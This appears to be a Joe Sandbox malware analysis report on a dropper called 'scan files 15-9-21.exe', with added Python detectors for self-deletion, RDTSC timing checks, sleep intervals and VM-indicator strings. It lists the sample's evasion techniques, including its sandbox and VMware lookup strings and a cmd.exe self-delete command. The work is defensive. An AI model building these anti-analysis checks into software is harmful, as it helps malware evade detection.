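SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Drop locations a user can write to (assumption: extend for your estate).
USER_DIRS = ("c:\\users\\", "c:\\programdata\\")


def deleted_target(cmdline):
    """Path a cmd.exe command line deletes, or None."""
    m = DEL_RE.search(cmdline)
    return m.group("target") if m else None


def lineage(by_pid, pid):
    """Ancestor events from pid upwards; stops at unknown parents or loops."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain


def detect_self_delete(events):
    """Return [(cmd_pid, reason, deleted_path), ...]."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for ev in events:
        if not ev["image"].lower().endswith("\\cmd.exe"):
            continue
        target = deleted_target(ev["cmdline"])
        if target is None:
            continue
        ancestors = lineage(by_pid, ev["ppid"])
        t = target.lower()
        if any(a["image"].lower() == t for a in ancestors):
            # Classic case: the sample spawns cmd to remove its own file.
            alerts.append((ev["pid"], "cmd deletes an ancestor's own image", target))
        elif ancestors and ancestors[0]["image"].lower().startswith(SYSTEM_DIRS) \
                and t.startswith(USER_DIRS):
            # This report's case: the deleting parent is a hollowed Windows
            # binary, so the sample is nowhere in cmd's lineage.
            alerts.append((ev["pid"],
                           "system binary deletes a user-dropped executable (possible hollowed host)",
                           target))
    return alerts


SAMPLE = r"C:\Users\user\Desktop\scan files 15-9-21.exe"
EVENTS = [  # constructed pids; images and parentage follow the report's process tree
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 101, "ppid": 100, "image": SAMPLE, "cmdline": f'"{SAMPLE}"'},
    {"pid": 102, "ppid": 101, "image": SAMPLE, "cmdline": SAMPLE},
    {"pid": 103, "ppid": 100, "image": r"C:\Windows\SysWOW64\WWAHost.exe",
     "cmdline": r"C:\Windows\SysWOW64\WWAHost.exe"},
    {"pid": 104, "ppid": 103, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": f'/c del "{SAMPLE}"'},
    {"pid": 105, "ppid": 104, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

if __name__ == "__main__":
    for alert in detect_self_delete(EVENTS):
        print(alert)
```

The second rule is the one that fires on this sample; the first exists so the same detector still covers droppers that delete themselves without first moving into a host process.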
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information set: NOOPENFILEERRORBOX (29 identical entries)
Source: C:\Windows\SysWOW64\WWAHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: scan files 15-9-21.exe PID: 6752, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\scan files 15-9-21.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\scan files 15-9-21.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 00000000008785E4 second address: 00000000008785EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 000000000087897E second address: 0000000000878984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
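
Each pair above is two rdtsc reads six bytes apart with the first result parked in ecx (rdtsc; xor ecx,ecx; add ecx,eax; rdtsc), i.e. a timing delta that grows under single-stepping or instrumentation. The WWAHost.exe addresses differ from the scan files 15-9-21.exe addresses by a constant 0x470000 (0x8785E4 vs 0x4085E4, and likewise 0x008881C0 vs 0x004181C0 in the native-function list), which confirms the same payload image is mapped in both processes at different bases. The Python below is an added example, not Joe Sandbox code: a byte-level scanner that reports paired rdtsc opcodes within a small window, with a check for the exact sequence seen here; the code buffer is constructed. Because it does not disassemble, 0F 31 inside an unrelated instruction can produce a false hit, so treat the output as candidates to confirm in a disassembler.

```python
"""Scan raw x86 code for paired RDTSC timing checks.

Added example for this report, not Joe Sandbox code. The buffer below is
constructed: it embeds the exact sequence the report shows at 0x4085E4
(rdtsc; xor ecx,ecx; add ecx,eax; rdtsc) inside NOP filler.
"""
RDTSC = b"\x0f\x31"
XOR_ECX_ECX = b"\x31\xc9"      # 31 /r with ModRM C9 = xor ecx, ecx
ADD_ECX_EAX = b"\x01\xc1"      # 01 /r with ModRM C1 = add ecx, eax
REPORTED_SEQUENCE = RDTSC + XOR_ECX_ECX + ADD_ECX_EAX + RDTSC


def find_rdtsc_pairs(code, base=0, max_gap=32):
    """Return [(first_va, second_va, gap_bytes), ...] for every rdtsc that is
    followed by another rdtsc within max_gap bytes.

    Two reads that close together are a delta measurement (the gap holds the
    code that saves the first result); a lone rdtsc is common in benign code
    (RNG seeding, profiling) and is deliberately not reported. Caveat: this is
    a byte scan, not a disassembly, so 0F 31 inside another instruction's
    operand bytes can produce a false candidate.
    """
    hits = []
    pos = code.find(RDTSC)
    while pos != -1:
        nxt = code.find(RDTSC, pos + 2, pos + 2 + max_gap)
        if nxt != -1:
            hits.append((base + pos, base + nxt, nxt - pos))
        pos = code.find(RDTSC, pos + 1)
    return hits


def matches_reported_sequence(code, offset):
    """True if the bytes at offset are exactly the 8-byte check from the report."""
    return code[offset:offset + len(REPORTED_SEQUENCE)] == REPORTED_SEQUENCE


def describe(code, base=0):
    """Human-readable summary lines for each candidate pair."""
    lines = []
    for first, second, gap in find_rdtsc_pairs(code, base):
        exact = matches_reported_sequence(code, first - base)
        lines.append(f"rdtsc pair at {first:#010x} -> {second:#010x}, gap {gap} bytes"
                     f"{' (report sequence)' if exact else ''}")
    return lines


# Constructed buffer, laid out so the pair lands at the reported VA 0x4085E4.
SAMPLE_BASE = 0x4085C4
SAMPLE_CODE = (b"\x90" * 0x20            # filler before the check
               + REPORTED_SEQUENCE         # offset 0x20: the reported check
               + b"\x90" * 0x40
               + RDTSC                     # a lone rdtsc: not a pair, not reported
               + b"\x90" * 0x40)

if __name__ == "__main__":
    for line in describe(SAMPLE_CODE, SAMPLE_BASE):
        print(line)
```

Point it at the unpacked payload dumped from either process (base 0x400000 or 0x870000) and the two pairs the report lists should be the first candidates it prints.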
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\scan files 15-9-21.exe TID: 6756 Thread sleep time: -35907s >= -30000s
Source: C:\Users\user\Desktop\scan files 15-9-21.exe TID: 6772 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 6308 Thread sleep time: -35000s >= -30000s
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 4712 Thread sleep time: -38000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WWAHost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_004088B0 rdtsc 2_2_004088B0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Thread delayed: delay time: 35907
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Thread delayed: delay time: 922337203685477
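
The 922337203685477 entry is not a computed delay: it is 2^63 / 10^4 truncated, so the raw DelayInterval was 0x8000000000000000, the value kernelbase's SleepEx passes to NtDelayExecution for Sleep(INFINITE). That thread is parked for good rather than stalling the sandbox, while 35907, 35000 and 38000 are ordinary relative waits that happen to sit just above the signature's 30000 threshold. The arithmetic also implies the displayed numbers are the interval divided by 10^4, i.e. milliseconds, despite the "s" suffix the report prints. The Python below is an added example, not Joe Sandbox code: it decodes NtDelayExecution intervals (negative = relative, positive = absolute FILETIME, most negative = infinite), maps the displayed values back to raw intervals, and classifies them against the 30 s and 3 min thresholds the signatures above use.

```python
"""Decode NtDelayExecution intervals and classify the report's sleep values.

Added example for this report, not Joe Sandbox code. Thresholds come from the
signature texts above (30 s for the evasive-loop check, 3 min for long sleeps);
reading the displayed numbers as milliseconds is the inference made in the
text above, not a documented Joe Sandbox unit.
"""
INFINITE_SENTINEL = -(1 << 63)      # 0x8000000000000000 as a signed 64-bit value
HUNDRED_NS_PER_SEC = 10_000_000
HUNDRED_NS_PER_MS = 10_000


def decode_delay(interval_100ns):
    """Interpret a LARGE_INTEGER DelayInterval as (kind, seconds).

    Negative values are relative waits in 100 ns units, positive values are
    absolute FILETIME deadlines, and the most negative value is the INFINITE
    encoding SleepEx(INFINITE) hands to NtDelayExecution.
    """
    if interval_100ns == INFINITE_SENTINEL:
        return "infinite", float("inf")
    if interval_100ns < 0:
        return "relative", -interval_100ns / HUNDRED_NS_PER_SEC
    return "absolute", interval_100ns / HUNDRED_NS_PER_SEC


def from_report_ms(shown):
    """Map a displayed value (raw interval / 10**4, sign kept) back to the raw
    100 ns interval. A value within one millisecond of -2**63 / 10**4 is the
    truncated INFINITE sentinel, so restore it exactly."""
    raw = shown * HUNDRED_NS_PER_MS
    if shown < 0 and -raw >= (1 << 63) - HUNDRED_NS_PER_MS:
        return INFINITE_SENTINEL
    return raw


def classify(shown_values, evasive_s=30.0, long_sleep_s=180.0):
    """[(shown, kind, seconds, label), ...] for each displayed sleep value."""
    out = []
    for shown in shown_values:
        kind, secs = decode_delay(from_report_ms(shown))
        if kind == "infinite":
            label = "infinite wait (Sleep(INFINITE)): thread parked, not a timed evasion"
        elif kind == "absolute":
            label = "absolute FILETIME deadline, not a duration"
        elif secs >= long_sleep_s:
            label = "long sleep (>= 3 min)"
        elif secs >= evasive_s:
            label = "sleep above the 30 s evasion threshold"
        else:
            label = "short sleep"
        out.append((shown, kind, secs, label))
    return out


# The four 'Thread sleep time' values shown above, as displayed.
REPORT_VALUES = [-35907, -922337203685477, -35000, -38000]

if __name__ == "__main__":
    for shown, kind, secs, label in classify(REPORT_VALUES):
        print(f"{shown:>18} {kind:9s} {secs:>10.3f}s {label}")
```

Filtering the sentinel out before applying a sleep-length threshold keeps an idle worker thread from being reported as a three-minute evasion.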
Source: explorer.exe, 00000003.00000000.274069496.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000003.00000000.274069496.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000000.275972062.000000000ECF0000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.274227588.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000003.00000000.274227588.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000003.00000000.267087744.00000000048E0000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.274140745.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000003.00000000.274227588.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: explorer.exe, 00000003.00000000.274140745.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.292230436.00000000069DA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD002
Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
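
The strings found in the first-stage process memory (SBIEDLL.DLL for Sandboxie, WINE_GET_UNIX_FILE_NAME for Wine, the VMware Tools path and registry key, the VMware SVGA II adapter name, and the Scsi/Disk enumeration keys) come from the same memory region the AntiVM3 Yara rule matched and are the lookup table of that check; the explorer.exe entries (VMware SATA CD00 device paths) are most likely the analysis VM's own device strings in explorer's memory and say nothing about the sample. Because the first stage is .NET, these literals sit in memory as UTF-16LE, so an ASCII-only strings pass misses them. The Python below is an added example, not Joe Sandbox code: it scans a dump for the indicators listed above in both ASCII and UTF-16LE, case-insensitively, and reports which product families they point at; the dump is constructed and the family labels are the author's own.

```python
"""Find sandbox/VM indicator strings in a memory dump, ASCII and UTF-16LE.

Added example for this report, not Joe Sandbox code. Indicators are the
'Binary or memory string' values listed above; the dump is constructed and
the family labels are the author's own.
"""

INDICATORS = [
    ("SbieDll.dll", "Sandboxie"),
    ("wine_get_unix_file_name", "Wine"),
    ("VMware", "VMware"),
    ("VMware SVGA II", "VMware"),
    (r"SOFTWARE\VMware, Inc.\VMware Tools", "VMware"),
    ("C:\\PROGRAM FILES\\VMWARE\\VMWARE TOOLS\\", "VMware"),
    (r"SYSTEM\ControlSet001\Services\Disk\Enum", "disk enumeration"),
    (r"HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0",
     "disk enumeration"),
    ("{4D36E968-E325-11CE-BFC1-08002BE10318}", "display adapter enumeration"),
]


def encoded_needles(text):
    """Lower-cased byte patterns for an indicator in both encodings a .NET
    process may hold it in. bytes.lower() folds ASCII letters only, which is
    exactly right for UTF-16LE-encoded ASCII text (low byte letter, high byte 0)."""
    return {
        "ascii": text.encode("ascii").lower(),
        "utf-16le": text.encode("utf-16-le").lower(),
    }


def scan(dump, indicators=INDICATORS):
    """Return [(indicator, encoding, offset, family), ...] sorted by offset.
    Matching is case-insensitive because the sample upper-cases some of these
    values (SBIEDLL.DLL, WINE_GET_UNIX_FILE_NAME) before comparing."""
    haystack = dump.lower()
    hits = []
    for text, family in indicators:
        for encoding, needle in encoded_needles(text).items():
            start = 0
            while True:
                pos = haystack.find(needle, start)
                if pos == -1:
                    break
                hits.append((text, encoding, pos, family))
                start = pos + 1
    return sorted(hits, key=lambda h: h[2])


def families(hits):
    """Distinct product families the hits point at."""
    return {h[3] for h in hits}


def build_dump():
    """Constructed dump: a mix of ASCII and UTF-16LE copies, as a .NET loader
    that has upper-cased some comparisons would leave them in memory."""
    pad = b"\x00" * 48
    return (pad + b"WINE_GET_UNIX_FILE_NAME" + pad
            + "SbieDll.dll".encode("utf-16-le") + pad
            + b"VMware SVGA II" + pad
            + r"SOFTWARE\VMware, Inc.\VMware Tools".encode("utf-16-le") + pad)


if __name__ == "__main__":
    found = scan(build_dump())
    for text, encoding, offset, family in found:
        print(f"{offset:#08x} {encoding:8s} {family:28s} {text}")
    print("families:", sorted(families(found)))
```

"VMware" also matches inside the longer VMware strings, which is intended: when triaging a dump you want every offset, and the family set collapses the duplicates.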

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Code function: 2_2_004088B0 rdtsc 2_2_004088B0
Enables debug privileges
Source: C:\Users\user\Desktop\scan files 15-9-21.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WWAHost.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366DB60 mov ecx, dword ptr fs:[00000030h] 13_2_0366DB60
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367FF60 mov eax, dword ptr fs:[00000030h] 13_2_0367FF60
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03693B7A mov eax, dword ptr fs:[00000030h] 13_2_03693B7A (2 occurrences)
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03738F6A mov eax, dword ptr fs:[00000030h] 13_2_03738F6A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366DB40 mov eax, dword ptr fs:[00000030h] 13_2_0366DB40
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367EF40 mov eax, dword ptr fs:[00000030h] 13_2_0367EF40
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03738B58 mov eax, dword ptr fs:[00000030h] 13_2_03738B58
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366F358 mov eax, dword ptr fs:[00000030h] 13_2_0366F358
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03664F2E mov eax, dword ptr fs:[00000030h] 13_2_03664F2E (2 occurrences)
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369E730 mov eax, dword ptr fs:[00000030h] 13_2_0369E730
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369A70E mov eax, dword ptr fs:[00000030h] 13_2_0369A70E (2 occurrences)
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0372131B mov eax, dword ptr fs:[00000030h] 13_2_0372131B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0373070D mov eax, dword ptr fs:[00000030h] 13_2_0373070D (2 occurrences)
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0368F716 mov eax, dword ptr fs:[00000030h] 13_2_0368F716
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036FFF10 mov eax, dword ptr fs:[00000030h] 13_2_036FFF10 (2 occurrences)
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036903E2 mov eax, dword ptr fs:[00000030h] 13_2_036903E2 (6 occurrences)
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A37F5 mov eax, dword ptr fs:[00000030h] 13_2_036A37F5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E53CA mov eax, dword ptr fs:[00000030h] 13_2_036E53CA (2 occurrences)
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03694BAD mov eax, dword ptr fs:[00000030h] 13_2_03694BAD (3 occurrences)
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03735BA5 mov eax, dword ptr fs:[00000030h] 13_2_03735BA5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03671B8F mov eax, dword ptr fs:[00000030h] 13_2_03671B8F (2 occurrences)
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0371D380 mov ecx, dword ptr fs:[00000030h] 13_2_0371D380
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03678794 mov eax, dword ptr fs:[00000030h] 13_2_03678794
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0372138A mov eax, dword ptr fs:[00000030h] 13_2_0372138A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369B390 mov eax, dword ptr fs:[00000030h] 13_2_0369B390
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E7794 mov eax, dword ptr fs:[00000030h] 13_2_036E7794 (3 occurrences)
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03692397 mov eax, dword ptr fs:[00000030h] 13_2_03692397
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367766D mov eax, dword ptr fs:[00000030h] 13_2_0367766D
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A927A mov eax, dword ptr fs:[00000030h] 13_2_036A927A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0371B260 mov eax, dword ptr fs:[00000030h] 13_2_0371B260 (2 occurrences)
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03738A62 mov eax, dword ptr fs:[00000030h] 13_2_03738A62
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0368AE73 mov eax, dword ptr fs:[00000030h] 13_2_0368AE73 (5 occurrences)
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03669240 mov eax, dword ptr fs:[00000030h] 13_2_03669240 (4 occurrences)
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03677E41 mov eax, dword ptr fs:[00000030h] 13_2_03677E41 (6 occurrences)
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036F4257 mov eax, dword ptr fs:[00000030h] 13_2_036F4257
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366E620 mov eax, dword ptr fs:[00000030h] 13_2_0366E620
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A4A2C mov eax, dword ptr fs:[00000030h] 13_2_036A4A2C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A4A2C mov eax, dword ptr fs:[00000030h] 13_2_036A4A2C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0371FE3F mov eax, dword ptr fs:[00000030h] 13_2_0371FE3F
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366C600 mov eax, dword ptr fs:[00000030h] 13_2_0366C600
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366C600 mov eax, dword ptr fs:[00000030h] 13_2_0366C600
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366C600 mov eax, dword ptr fs:[00000030h] 13_2_0366C600
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03698E00 mov eax, dword ptr fs:[00000030h] 13_2_03698E00
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03678A0A mov eax, dword ptr fs:[00000030h] 13_2_03678A0A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366AA16 mov eax, dword ptr fs:[00000030h] 13_2_0366AA16
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366AA16 mov eax, dword ptr fs:[00000030h] 13_2_0366AA16
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03683A1C mov eax, dword ptr fs:[00000030h] 13_2_03683A1C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369A61C mov eax, dword ptr fs:[00000030h] 13_2_0369A61C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369A61C mov eax, dword ptr fs:[00000030h] 13_2_0369A61C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036776E2 mov eax, dword ptr fs:[00000030h] 13_2_036776E2
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036916E0 mov ecx, dword ptr fs:[00000030h] 13_2_036916E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03692AE4 mov eax, dword ptr fs:[00000030h] 13_2_03692AE4
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03692ACB mov eax, dword ptr fs:[00000030h] 13_2_03692ACB
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03738ED6 mov eax, dword ptr fs:[00000030h] 13_2_03738ED6
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036936CC mov eax, dword ptr fs:[00000030h] 13_2_036936CC
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036A8EC7 mov eax, dword ptr fs:[00000030h] 13_2_036A8EC7
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0371FEC0 mov eax, dword ptr fs:[00000030h] 13_2_0371FEC0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036652A5 mov eax, dword ptr fs:[00000030h] 13_2_036652A5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036652A5 mov eax, dword ptr fs:[00000030h] 13_2_036652A5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036652A5 mov eax, dword ptr fs:[00000030h] 13_2_036652A5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036652A5 mov eax, dword ptr fs:[00000030h] 13_2_036652A5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036652A5 mov eax, dword ptr fs:[00000030h] 13_2_036652A5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036E46A7 mov eax, dword ptr fs:[00000030h] 13_2_036E46A7
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03730EA5 mov eax, dword ptr fs:[00000030h] 13_2_03730EA5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03730EA5 mov eax, dword ptr fs:[00000030h] 13_2_03730EA5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_03730EA5 mov eax, dword ptr fs:[00000030h] 13_2_03730EA5
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367AAB0 mov eax, dword ptr fs:[00000030h] 13_2_0367AAB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0367AAB0 mov eax, dword ptr fs:[00000030h] 13_2_0367AAB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369FAB0 mov eax, dword ptr fs:[00000030h] 13_2_0369FAB0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_036FFE87 mov eax, dword ptr fs:[00000030h] 13_2_036FFE87
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369D294 mov eax, dword ptr fs:[00000030h] 13_2_0369D294
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0369D294 mov eax, dword ptr fs:[00000030h] 13_2_0369D294
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366C962 mov eax, dword ptr fs:[00000030h] 13_2_0366C962
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366B171 mov eax, dword ptr fs:[00000030h] 13_2_0366B171
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0366B171 mov eax, dword ptr fs:[00000030h] 13_2_0366B171
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 13_2_0368C577 mov eax, dword ptr fs:[00000030h] 13_2_0368C577
